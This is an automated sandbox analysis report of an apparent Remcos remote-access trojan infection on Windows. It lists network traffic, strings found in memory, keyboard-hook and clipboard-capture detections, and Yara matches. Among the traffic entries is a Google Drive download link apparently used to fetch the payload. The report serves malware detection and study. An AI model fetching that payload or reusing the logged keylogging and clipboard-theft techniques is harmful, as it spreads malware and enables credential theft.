                    Source: global trafficHTTP traffic detected: GET /api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop HTTP/1.1Accept-Encoding: gzip, deflateHost: cxcs.microsoft.netConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DTLaKFkphhrsh9g&MD=4mKMnfvA HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /download?id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
                    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DTLaKFkphhrsh9g&MD=4mKMnfvA HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                    Source: global trafficDNS traffic detected: DNS query: www.google.com
                    Source: global trafficDNS traffic detected: DNS query: drive.google.com
                    Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
                    Source: global trafficDNS traffic detected: DNS query: www.pentegrasystem.com
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 26Date: Fri, 26 Apr 2024 19:56:05 GMTConnection: close
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                    Source: xkn.exe, 00000009.00000002.2186571233.0000015A4AE96000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                    Source: kn.exeString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                    Source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
                    Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/user
                    Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2323628754.0000000000837000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, Kpeyvroh.PIFString found in binary or memory: http://geoplugin.net/json.gp
                    Source: sppsvc.pif, 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000026.00000002.2516862809.000000001B02B000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp2BF
                    Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpK0r
                    Source: sppsvc.pif, 0000001C.00000003.2323628754.0000000000837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpa
                    Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpoft
                    Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpthority
                    Source: xkn.exe, 00000009.00000002.2180228886.0000015A42F66000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2180228886.0000015A42E2F000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A32DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                    Source: Kpeyvroh.PIF, Kpeyvroh.PIF, 00000024.00000002.2421237324.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2465696824.000000007FBA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
                    Source: kn.exeString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
                    Source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.drString found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A32DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: sppsvc.pif, 0000001C.00000002.4519735851.000000001A71D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?expo
                    Source: sppsvc.pif, 0000001C.00000002.4519735851.000000001A700000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB
                    Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4502894836.00000000007F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/6
                    Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094405950.0000000000796000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB&export=download
                    Source: sppsvc.pif, 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com:443/download?id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB&export=downlo
                    Source: kn.exe | String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
                    Source: kn.exe | String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
                    Source: kn.exe | String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                    Source: kn.exe | String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
                    Source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr | String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
                    Source: kn.exe | String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
                    Source: SystemSettingsAdminFlows.exe, 00000013.00000002.4501063823.000001C6008E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.windows.local
                    Source: xkn.exe, 00000009.00000002.2180228886.0000015A42F66000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2180228886.0000015A42E2F000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
                    Source: xkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
                    Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://sectigo.com/CPS0
                    Source: unknown | HTTPS traffic detected: 23.35.153.42:443 -> 192.168.2.5:49717 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49719 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49720 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49721 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 142.250.217.193:443 -> 192.168.2.5:49729 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49732 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1B9FA2B8 SetWindowsHookExA 0000000D,1B9FA2A4,00000000
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\sppsvc.pif
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1B9FB70E OpenClipboard,GetClipboardData,CloseClipboard
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_210768C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1B9FA3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx
                    Source: Yara match | File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR

                    E-Banking Fraud

                    Source: Yara match | File source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000024.00000002.2419249499.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001C.00000002.4524281071.000000001B7CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000026.00000002.2504569132.000000000067A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR
                    Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DEE60BC CertCreateCertificateContext,GetLastError,#357,CertAddCertificateContextToStore,GetLastError,#357,CertCompareCertificateName,CertOpenStore,GetLastError,CertAddCertificateContextToStore,GetLastError,CertFreeCertificateContext,CertCloseStore

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Users\Public\Libraries\sppsvc.pif | Code function: 28_2_1BA0C9E2 SystemParametersInfoW
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIF | Code function: 36_2_2107C9E2 SystemParametersInfoW
                    Source: C:\Users\Public\xkn.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                    Source: C:\Users\Public\xkn.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell
                    Source: C:\Users\Public\xkn.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                    Source: C:\Users\Public\xkn.exe | Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
                    Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DE5F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree
                    Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DE6FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357
                    Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DF098B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext
                    Source: C:\Users\Public\kn.exe | Code function: 25_2_00007FF67DEC184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree
